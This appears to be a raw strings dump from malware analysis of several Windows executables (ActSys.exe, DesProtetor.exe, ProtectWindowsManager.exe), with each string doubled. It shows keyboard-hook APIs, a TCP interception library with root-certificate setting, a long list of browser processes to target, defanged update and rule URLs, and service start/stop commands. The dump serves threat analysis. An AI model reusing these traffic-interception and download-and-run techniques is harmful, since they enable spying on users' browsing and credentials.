%s (%s)

imm32.dll

imm32.dll

AutoHotkeys

AutoHotkeys

ssHotTrack

ssHotTrack

TWindowState

TWindowState

poProportional

poProportional

TWMKey

TWMKey

KeyPreview

KeyPreview

WindowState

WindowState

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

vcltest3.dll

vcltest3.dll

User32.dll

User32.dll

Password

Password

OnExecutepWE

OnExecutepWE

127.0.0.1

127.0.0.1

255.0.0.0

255.0.0.0

ServiceExecute

ServiceExecute

\G_CheckUpdate.txt

\G_CheckUpdate.txt

NOVA UPDATE DISPONIVEL! URL:

NOVA UPDATE DISPONIVEL! URL:

\gs_update.exe

\gs_update.exe

hXXp://VVV.gosaferllc.com/services/rules.txt?dummy=

hXXp://VVV.gosaferllc.com/services/rules.txt?dummy=

hXXp://VVV.gosaferllc.com/services/update.php?v=

hXXp://VVV.gosaferllc.com/services/update.php?v=

&key=

&key=

\G_RuleList.txt

\G_RuleList.txt

[E] ProductKey :

[E] ProductKey :

[N] ProductKey :

[N] ProductKey :

cmd.exe /c net start GOSafer

cmd.exe /c net start GOSafer

cmd.exe /c net stop GOSafer

cmd.exe /c net stop GOSafer

c:\log.log

c:\log.log

user32.dll

user32.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

ReportEventA

ReportEventA

RegFlushKey

RegFlushKey

RegCreateKeyExA

RegCreateKeyExA

WinExec

WinExec

GetCPInfo

GetCPInfo

version.dll

version.dll

gdi32.dll

gdi32.dll

SetViewportOrgEx

SetViewportOrgEx

UnhookWindowsHookEx

UnhookWindowsHookEx

SetWindowsHookExA

SetWindowsHookExA

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

MapVirtualKeyA

MapVirtualKeyA

LoadKeyboardLayoutA

LoadKeyboardLayoutA

GetKeyboardState

GetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyboardLayout

GetKeyState

GetKeyState

GetKeyNameTextA

GetKeyNameTextA

EnumWindows

EnumWindows

EnumThreadWindows

EnumThreadWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

wsock32.dll

wsock32.dll

nfapi.dll

nfapi.dll

nf_tcpDisableFiltering

nf_tcpDisableFiltering

nf_setTCPTimeout

nf_setTCPTimeout

nf_tcpClose

nf_tcpClose

nf_tcpPostReceive

nf_tcpPostReceive

nf_tcpPostSend

nf_tcpPostSend

nf_tcpSetConnectionState

nf_tcpSetConnectionState

psapi.dll

psapi.dll

ProtocolFilters.dll

ProtocolFilters.dll

5l6O6W6

5l6O6W6

?!?%?)?-?1?5?9?=?

?!?%?)?-?1?5?9?=?

5%6x6

5%6x6

1 1$1(1,1014181

1 1$1(1,1014181

0&0.080=0

0&0.080=0

2%3)3-31383

2%3)3-31383

; ;$;(;,;0;4;8;

; ;$;(;,;0;4;8;

1#1'1 1/13171;1

1#1'1 1/13171;1

=!=,=7=?=_=

=!=,=7=?=_=

5 5$5(5,505

5 5$5(5,505

3 3$3(3,3

3 3$3(3,3

3 3$3(3,3034383

3 3$3(3,3034383

333333333333333333

333333333333333333

33333833

33333833

3333339

3333339

3333333333333338

3333333333333338

:*"*"$3338

:*"*"$3338

3333333

3333333

33333333

33333333

33333333333

33333333333

3333333333338

3333333333338

33338?383

33338?383

333333333333

333333333333

:*3:"$3338

:*3:"$3338

333333333333333

333333333333333

KWindows

KWindows

UrlMon

UrlMon

OnExecute

OnExecute

No help keyword specified.

No help keyword specified.

No help found for %s#No context-sensitive help installed$No topic-based help system installed

No help found for %s#No context-sensitive help installed$No topic-based help system installed

shutdown(Service failed in custom message(%d): %s

shutdown(Service failed in custom message(%d): %s

Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"

Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"

Error downloading URL: %s

Error downloading URL: %s

Unable to load %s"Unable to find a Table of Contents

Unable to load %s"Unable to find a Table of Contents

Alt Clipboard does not support Icons

Alt Clipboard does not support Icons

Cannot open clipboard/Menu '%s' is already being used by another form

Cannot open clipboard/Menu '%s' is already being used by another form

Service failed on %s: %s

Service failed on %s: %s

Unsupported clipboard format

Unsupported clipboard format

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

Error reading %s%s%s: %s

Error reading %s%s%s: %s

Failed to get data for '%s'

Failed to get data for '%s'

Failed to set data for '%s'

Failed to set data for '%s'

Resource %s not found

Resource %s not found

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Property %s does not exist

Thread creation error: %s

Thread creation error: %s

Thread Error: %s (%d)

Thread Error: %s (%d)

Class %s not found

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file "%s". %s

Cannot create file "%s". %s

Cannot open file "%s". %s

Cannot open file "%s". %s

Invalid stream format$''%s'' is not a valid component name

Invalid stream format$''%s'' is not a valid component name

Invalid data type for '%s' List capacity out of bounds (%d)

Invalid data type for '%s' List capacity out of bounds (%d)

List count out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d)

List index out of bounds (%d)

Ancestor for '%s' not found

Ancestor for '%s' not found

Cannot assign a %s to a %s

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

%s (%s, line %d)

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

System Error. Code: %d.

Invalid variant operation%Invalid variant operation (%s%.8x)

Invalid variant operation%Invalid variant operation (%s%.8x)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

Operation not supported

Operation not supported

External exception %x

External exception %x

Interface not supported

Interface not supported

Invalid pointer operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction(Exception %s in module %s at %p.

Privileged instruction(Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

No argument for format '%s'"Variant method calls not supported

!'%s' is not a valid integer value

!'%s' is not a valid integer value

I/O error %d

I/O error %d

Integer overflow Invalid floating point operation

Integer overflow Invalid floating point operation

ActSys.exe_3756:

.idata

.idata

.rdata

.rdata

P.reloc

P.reloc

P.rsrc

P.rsrc

kernel32.dll

kernel32.dll

Windows

Windows

MSWHEEL_ROLLMSG

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

MSH_SCROLL_LINES_MSG

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

oleaut32.dll

EVariantBadIndexError

EVariantBadIndexError

ssShift

ssShift

htKeyword

htKeyword

EInvalidOperation

EInvalidOperation

u%CNu

u%CNu

%s[%d]

%s[%d]

%s_%d

%s_%d

EInvalidGraphicOperation

EInvalidGraphicOperation

UhWEB

UhWEB

USER32.DLL

USER32.DLL

comctl32.dll

comctl32.dll

uxtheme.dll

uxtheme.dll

%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s

Proportional

Proportional

MAPI32.DLL

MAPI32.DLL

TURLAction

TURLAction

HelpKeyword

HelpKeyword

TURLDownloadStatus

TURLDownloadStatus

dsBeginSyncOperation

dsBeginSyncOperation

dsEndSyncOperation

dsEndSyncOperation

dsFilterReportMIMEType

dsFilterReportMIMEType

TDownLoadURL

TDownLoadURL

URLMON.DLL

URLMON.DLL

URLDownloadToFileA

URLDownloadToFileA

OnKeyDown

OnKeyDown

OnKeyPress

OnKeyPress

OnKeyUp

OnKeyUp

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

JumpID("","%s")

JumpID("","%s")

TKeyEvent

TKeyEvent

TKeyPressEvent

TKeyPressEvent

HelpKeyword

HelpKeyword

crSQLWait

crSQLWait

%s (%s)

%s (%s)

imm32.dll

imm32.dll

AutoHotkeys

AutoHotkeys

ssHotTrack

ssHotTrack

TWindowState

TWindowState

poProportional

poProportional

TWMKey

TWMKey

KeyPreviewx4D

KeyPreviewx4D

WindowState

WindowState

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

vcltest3.dll

vcltest3.dll

User32.dll

User32.dll

Password

Password

OnExecute

OnExecute

iexplore.exe

iexplore.exe

firefox.exe

firefox.exe

chrome.exe

chrome.exe

safari.exe

safari.exe

opera.exe

opera.exe

netscape.exe

netscape.exe

torch.exe

torch.exe

seamonkey.exe

seamonkey.exe

k-meleon.exe

k-meleon.exe

konqueror.exe

konqueror.exe

maxthon.exe

maxthon.exe

flock.exe

flock.exe

lunascape.exe

lunascape.exe

amaya.exe

amaya.exe

midori.exe

midori.exe

kidzui.exe

kidzui.exe

rockmelt.exe

rockmelt.exe

sbrowser.exe

sbrowser.exe

slimbrowser.exe

slimbrowser.exe

kidrocket.exe

kidrocket.exe

epic.exe

epic.exe

ironbrowser.exe

ironbrowser.exe

comodo.exe

comodo.exe

comododragon.exe

comododragon.exe

crazybrowser.exe

crazybrowser.exe

arora.exe

arora.exe

shenzbrowser.exe

shenzbrowser.exe

enigmabrowser.exe

enigmabrowser.exe

avant.exe

avant.exe

avantbrowser.exe

avantbrowser.exe

orca.exe

orca.exe

xbbrowser.exe

xbbrowser.exe

xbrowser.exe

xbrowser.exe

sleipnir.exe

sleipnir.exe

spacetime.exe

spacetime.exe

3dbrowse.exe

3dbrowse.exe

bitty.exe

bitty.exe

java.exe

java.exe

grail.exe

grail.exe

lynx.exe

lynx.exe

twb.exe

twb.exe

tt.exe

tt.exe

pinkbrowser.exe

pinkbrowser.exe

nuke.exe

nuke.exe

acoo.exe

acoo.exe

palemoon.exe

palemoon.exe

slimboat.exe

slimboat.exe

dooble.exe

dooble.exe

menubox.exe

menubox.exe

chromium.exe

chromium.exe

ultrabrowser.exe

ultrabrowser.exe

zac.exe

zac.exe

kylo.exe

kylo.exe

morequick.exe

morequick.exe

wyzo.exe

wyzo.exe

xombrero.exe

xombrero.exe

qupzilla.exe

qupzilla.exe

cometbird.exe

cometbird.exe

qtweb.exe

qtweb.exe

deepnet.exe

deepnet.exe

xtravo.exe

xtravo.exe

smartbro.exe

smartbro.exe

jumpto.exe

jumpto.exe

weblock4kids.exe

weblock4kids.exe

weblock.exe

weblock.exe

comodoice.exe

comodoice.exe

srwareiron.exe

srwareiron.exe

srware.exe

srware.exe

coolnovo.exe

coolnovo.exe

cool.exe

cool.exe

qup.exe

qup.exe

browseme.exe

browseme.exe

swiftfox.exe

swiftfox.exe

omniweb.exe

omniweb.exe

omni.exe

omni.exe

spark.exe

spark.exe

bobrowser.exe

bobrowser.exe

crossbrowser.exe

crossbrowser.exe

crossbrowse.exe

crossbrowse.exe

content-security-policy-report-only

content-security-policy-report-only

127.0.0.1

127.0.0.1

255.0.0.0

255.0.0.0

ServiceExecute

ServiceExecute

\P_CheckUpdate.txt

\P_CheckUpdate.txt

NOVA UPDATE DISPONIVEL! URL:

NOVA UPDATE DISPONIVEL! URL:

\nj_update.exe

\nj_update.exe

hXXp://VVV.ninjasoftwarellc.com/services/rules.txt?dummy=

hXXp://VVV.ninjasoftwarellc.com/services/rules.txt?dummy=

hXXp://VVV.ninjasoftwarellc.com/services/update.php?v=

hXXp://VVV.ninjasoftwarellc.com/services/update.php?v=

&key=

&key=

\P_RuleList.txt

\P_RuleList.txt

[E] ProductKey :

[E] ProductKey :

[N] ProductKey :

[N] ProductKey :

cmd.exe /c net start ActSys

cmd.exe /c net start ActSys

cmd.exe /c net stop ActSys

cmd.exe /c net stop ActSys

user32.dll

user32.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

ReportEventA

ReportEventA

RegFlushKey

RegFlushKey

RegCreateKeyExA

RegCreateKeyExA

WinExec

WinExec

GetCPInfo

GetCPInfo

version.dll

version.dll

gdi32.dll

gdi32.dll

SetViewportOrgEx

SetViewportOrgEx

UnhookWindowsHookEx

UnhookWindowsHookEx

SetWindowsHookExA

SetWindowsHookExA

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

MapVirtualKeyA

MapVirtualKeyA

LoadKeyboardLayoutA

LoadKeyboardLayoutA

GetKeyboardState

GetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyboardLayout

GetKeyState

GetKeyState

GetKeyNameTextA

GetKeyNameTextA

EnumWindows

EnumWindows

EnumThreadWindows

EnumThreadWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

wsock32.dll

wsock32.dll

nfapi.dll

nfapi.dll

nf_tcpDisableFiltering

nf_tcpDisableFiltering

nf_setTCPTimeout

nf_setTCPTimeout

nf_tcpClose

nf_tcpClose

nf_tcpPostReceive

nf_tcpPostReceive

nf_tcpPostSend

nf_tcpPostSend

nf_tcpSetConnectionState

nf_tcpSetConnectionState

psapi.dll

psapi.dll

ProtocolFilters.dll

ProtocolFilters.dll

pfc_setRootSSLCertSubject

pfc_setRootSSLCertSubject

5l6O6W6

5l6O6W6

3?3

3?3

:!:%:6:>:

:!:%:6:>:

;$

;$

: :$:(:,:

: :$:(:,:

5-55595P5u5}5

5-55595P5u5}5

3 3$3(3,3034383

3 3$3(3,3034383

333333333333333333

333333333333333333

33333833

33333833

3333339

3333339

3333333333333338

3333333333333338

:*"*"$3338

:*"*"$3338

3333333

3333333

33333333

33333333

33333333333

33333333333

3333333333338

3333333333338

33338?383

33338?383

333333333333

333333333333

:*3:"$3338

:*3:"$3338

333333333333333

333333333333333

KWindows

KWindows

UrlMon

UrlMon

OnExecute

OnExecute

No help keyword specified.

No help keyword specified.

No help found for %s#No context-sensitive help installed$No topic-based help system installed

No help found for %s#No context-sensitive help installed$No topic-based help system installed

shutdown(Service failed in custom message(%d): %s

shutdown(Service failed in custom message(%d): %s

Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"

Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"

Error downloading URL: %s

Error downloading URL: %s

Unable to load %s"Unable to find a Table of Contents

Unable to load %s"Unable to find a Table of Contents

Alt Clipboard does not support Icons

Alt Clipboard does not support Icons

Cannot open clipboard/Menu '%s' is already being used by another form

Cannot open clipboard/Menu '%s' is already being used by another form

Service failed on %s: %s

Service failed on %s: %s

Unsupported clipboard format

Unsupported clipboard format

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

Error reading %s%s%s: %s

Error reading %s%s%s: %s

Failed to get data for '%s'

Failed to get data for '%s'

Failed to set data for '%s'

Failed to set data for '%s'

Resource %s not found

Resource %s not found

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Property %s does not exist

Thread creation error: %s

Thread creation error: %s

Thread Error: %s (%d)

Thread Error: %s (%d)

Class %s not found

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file "%s". %s

Cannot create file "%s". %s

Cannot open file "%s". %s

Cannot open file "%s". %s

Invalid stream format$''%s'' is not a valid component name

Invalid stream format$''%s'' is not a valid component name

Invalid data type for '%s' List capacity out of bounds (%d)

Invalid data type for '%s' List capacity out of bounds (%d)

List count out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d)

List index out of bounds (%d)

Ancestor for '%s' not found

Ancestor for '%s' not found

Cannot assign a %s to a %s

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

%s (%s, line %d)

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

System Error. Code: %d.

Invalid variant operation%Invalid variant operation (%s%.8x)

Invalid variant operation%Invalid variant operation (%s%.8x)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

Operation not supported

Operation not supported

External exception %x

External exception %x

Interface not supported

Interface not supported

Invalid pointer operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction(Exception %s in module %s at %p.

Privileged instruction(Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

No argument for format '%s'"Variant method calls not supported

!'%s' is not a valid integer value

!'%s' is not a valid integer value

I/O error %d

I/O error %d

Integer overflow Invalid floating point operation

Integer overflow Invalid floating point operation

DesProtetor.exe_4032:

.idata

.idata

.rdata

.rdata

P.reloc

P.reloc

P.rsrc

P.rsrc

kernel32.dll

kernel32.dll

Windows

Windows

MSWHEEL_ROLLMSG

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

MSH_SCROLL_LINES_MSG

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

oleaut32.dll

EVariantBadIndexError

EVariantBadIndexError

ssShift

ssShift

htKeyword

htKeyword

EInvalidOperation

EInvalidOperation

u%CNu

u%CNu

%s[%d]

%s[%d]

%s_%d

%s_%d

EInvalidGraphicOperation

EInvalidGraphicOperation

USER32.DLL

USER32.DLL

comctl32.dll

comctl32.dll

uxtheme.dll

uxtheme.dll

%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s

Proportional

Proportional

MAPI32.DLL

MAPI32.DLL

TURLAction

TURLAction

HelpKeywordp

HelpKeywordp

TURLDownloadStatus

TURLDownloadStatus

dsBeginSyncOperation

dsBeginSyncOperation

dsEndSyncOperation

dsEndSyncOperation

dsFilterReportMIMEType

dsFilterReportMIMEType

TDownLoadURL

TDownLoadURL

URLMON.DLL

URLMON.DLL

URLDownloadToFileA

URLDownloadToFileA

OnKeyDown

OnKeyDown

OnKeyPress

OnKeyPress

OnKeyUp

OnKeyUp

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

JumpID("","%s")

JumpID("","%s")

TKeyEvent

TKeyEvent

TKeyPressEvent

TKeyPressEvent

HelpKeywordT

HelpKeywordT

crSQLWait

crSQLWait

%s (%s)

%s (%s)

imm32.dll

imm32.dll

AutoHotkeys

AutoHotkeys

ssHotTrack

ssHotTrack

TWindowState

TWindowState

poProportional

poProportional

TWMKey

TWMKey

KeyPreview

KeyPreview

WindowState

WindowState

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

vcltest3.dll

vcltest3.dll

User32.dll

User32.dll

Password

Password

OnExecutepWE

OnExecutepWE

127.0.0.1

127.0.0.1

255.0.0.0

255.0.0.0

ServiceExecute

ServiceExecute

\P_CheckUpdate.txt

\P_CheckUpdate.txt

NOVA UPDATE DISPONIVEL! URL:

NOVA UPDATE DISPONIVEL! URL:

\po_update.exe

\po_update.exe

hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=

hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=

hXXp://VVV.brsoftwarellc.com/services/update.php?v=

hXXp://VVV.brsoftwarellc.com/services/update.php?v=

&key=

&key=

\P_RuleList.txt

\P_RuleList.txt

[E] ProductKey :

[E] ProductKey :

[N] ProductKey :

[N] ProductKey :

cmd.exe /c net start SaveSys

cmd.exe /c net start SaveSys

cmd.exe /c net stop SaveSys

cmd.exe /c net stop SaveSys

user32.dll

user32.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

ReportEventA

ReportEventA

RegFlushKey

RegFlushKey

RegCreateKeyExA

RegCreateKeyExA

WinExec

WinExec

GetCPInfo

GetCPInfo

version.dll

version.dll

gdi32.dll

gdi32.dll

SetViewportOrgEx

SetViewportOrgEx

UnhookWindowsHookEx

UnhookWindowsHookEx

SetWindowsHookExA

SetWindowsHookExA

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

MapVirtualKeyA

MapVirtualKeyA

LoadKeyboardLayoutA

LoadKeyboardLayoutA

GetKeyboardState

GetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyboardLayout

GetKeyState

GetKeyState

GetKeyNameTextA

GetKeyNameTextA

EnumWindows

EnumWindows

EnumThreadWindows

EnumThreadWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

wsock32.dll

wsock32.dll

nfapi.dll

nfapi.dll

nf_tcpDisableFiltering

nf_tcpDisableFiltering

nf_setTCPTimeout

nf_setTCPTimeout

nf_tcpClose

nf_tcpClose

nf_tcpPostReceive

nf_tcpPostReceive

nf_tcpPostSend

nf_tcpPostSend

nf_tcpSetConnectionState

nf_tcpSetConnectionState

psapi.dll

psapi.dll

ProtocolFilters.dll

ProtocolFilters.dll

5l6O6W6

5l6O6W6

?!?%?)?-?1?5?9?=?

?!?%?)?-?1?5?9?=?

5%6x6

5%6x6

1 1$1(1,1014181

1 1$1(1,1014181

0&0.080=0

0&0.080=0

2%3)3-31383

2%3)3-31383

; ;$;(;,;0;4;8;

; ;$;(;,;0;4;8;

1#1'1 1/13171;1

1#1'1 1/13171;1

=!=,=7=?=_=

=!=,=7=?=_=

5 5$5(5,505

5 5$5(5,505

3 3$3(3,3

3 3$3(3,3

3 3$3(3,3034383

3 3$3(3,3034383

333333333333333333

333333333333333333

33333833

33333833

3333339

3333339

3333333333333338

3333333333333338

:*"*"$3338

:*"*"$3338

3333333

3333333

33333333

33333333

33333333333

33333333333

3333333333338

3333333333338

33338?383

33338?383

333333333333

333333333333

:*3:"$3338

:*3:"$3338

333333333333333

333333333333333

A.mi*#9$

A.mi*#9$

KWindows

KWindows

UrlMon

UrlMon

OnExecute

OnExecute

No help keyword specified.

No help keyword specified.

No help found for %s#No context-sensitive help installed$No topic-based help system installed

No help found for %s#No context-sensitive help installed$No topic-based help system installed

shutdown(Service failed in custom message(%d): %s

shutdown(Service failed in custom message(%d): %s

Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"

Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"

Error downloading URL: %s

Error downloading URL: %s

Unable to load %s"Unable to find a Table of Contents

Unable to load %s"Unable to find a Table of Contents

Alt Clipboard does not support Icons

Alt Clipboard does not support Icons

Cannot open clipboard/Menu '%s' is already being used by another form

Cannot open clipboard/Menu '%s' is already being used by another form

Service failed on %s: %s

Service failed on %s: %s

Unsupported clipboard format

Unsupported clipboard format

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

Error reading %s%s%s: %s

Error reading %s%s%s: %s

Failed to get data for '%s'

Failed to get data for '%s'

Failed to set data for '%s'

Failed to set data for '%s'

Resource %s not found

Resource %s not found

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Property %s does not exist

Thread creation error: %s

Thread creation error: %s

Thread Error: %s (%d)

Thread Error: %s (%d)

Class %s not found

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file "%s". %s

Cannot create file "%s". %s

Cannot open file "%s". %s

Cannot open file "%s". %s

Invalid stream format$''%s'' is not a valid component name

Invalid stream format$''%s'' is not a valid component name

Invalid data type for '%s' List capacity out of bounds (%d)

Invalid data type for '%s' List capacity out of bounds (%d)

List count out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d)

List index out of bounds (%d)

Ancestor for '%s' not found

Ancestor for '%s' not found

Cannot assign a %s to a %s

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

%s (%s, line %d)

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

System Error. Code: %d.

Invalid variant operation%Invalid variant operation (%s%.8x)

Invalid variant operation%Invalid variant operation (%s%.8x)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

Operation not supported

Operation not supported

External exception %x

External exception %x

Interface not supported

Interface not supported

Invalid pointer operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction(Exception %s in module %s at %p.

Privileged instruction(Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

No argument for format '%s'"Variant method calls not supported

!'%s' is not a valid integer value

!'%s' is not a valid integer value

I/O error %d

I/O error %d

Integer overflow Invalid floating point operation

Integer overflow Invalid floating point operation

ProtectWindowsManager.exe_3736:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

j.Yf;

j.Yf;

_tcPVj@

_tcPVj@

.PjRW

.PjRW

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

SHELL32.dll

SHELL32.dll

function not supported

function not supported

operation canceled

operation canceled

address_family_not_supported

address_family_not_supported

operation_in_progress

operation_in_progress

operation_not_supported

operation_not_supported

protocol_not_supported

protocol_not_supported

operation_would_block

operation_would_block

address family not supported

address family not supported

broken pipe

broken pipe

inappropriate io control operation

inappropriate io control operation

not supported

not supported

operation in progress

operation in progress

operation not permitted

operation not permitted

operation not supported

operation not supported

operation would block

operation would block

protocol not supported

protocol not supported

GetProcessWindowStation

GetProcessWindowStation

operator

operator

SHLWAPI.dll

SHLWAPI.dll

%dYeArdMoNthdDaY

%dYeArdMoNthdDaY

URLDownloadToFileA

URLDownloadToFileA

file_url

file_url

ShellExecuteExW

ShellExecuteExW

SHDeleteKeyW

SHDeleteKeyW

GetWindowsDirectoryA

GetWindowsDirectoryA

GetProcessHeap

GetProcessHeap

GetSystemWindowsDirectoryW

GetSystemWindowsDirectoryW

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

RegCreateKeyExW

RegCreateKeyExW

RegCloseKey

RegCloseKey

RegOpenKeyExW

RegOpenKeyExW

RegCreateKeyW

RegCreateKeyW

ReportEventW

ReportEventW

ADVAPI32.dll

ADVAPI32.dll

PSAPI.DLL

PSAPI.DLL

USERENV.dll

USERENV.dll

VERSION.dll

VERSION.dll

GetCPInfo

GetCPInfo

zcÁ

zcÁ

263f3k3z3

263f3k3z3

=>>_> ?`?}?

=>>_> ?`?}?

5 5$5(5,5

5 5$5(5,5

? ?$?(?,?0?4?8?

? ?$?(?,?0?4?8?

:$:,:8:\:|:

:$:,:8:\:|:

%s_%s

%s_%s

\\.\Phys

\\.\Phys

..\Src\json\src\json_value.cpp

..\Src\json\src\json_value.cpp

..\Src\json\src\json_reader.cpp

..\Src\json\src\json_reader.cpp

xxxx

xxxx

..\Src\json\src\json_writer.cpp

..\Src\json\src\json_writer.cpp

kernel32.dll

kernel32.dll

mscoree.dll

mscoree.dll

- CRT not initialized

- CRT not initialized

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- floating point support not loaded

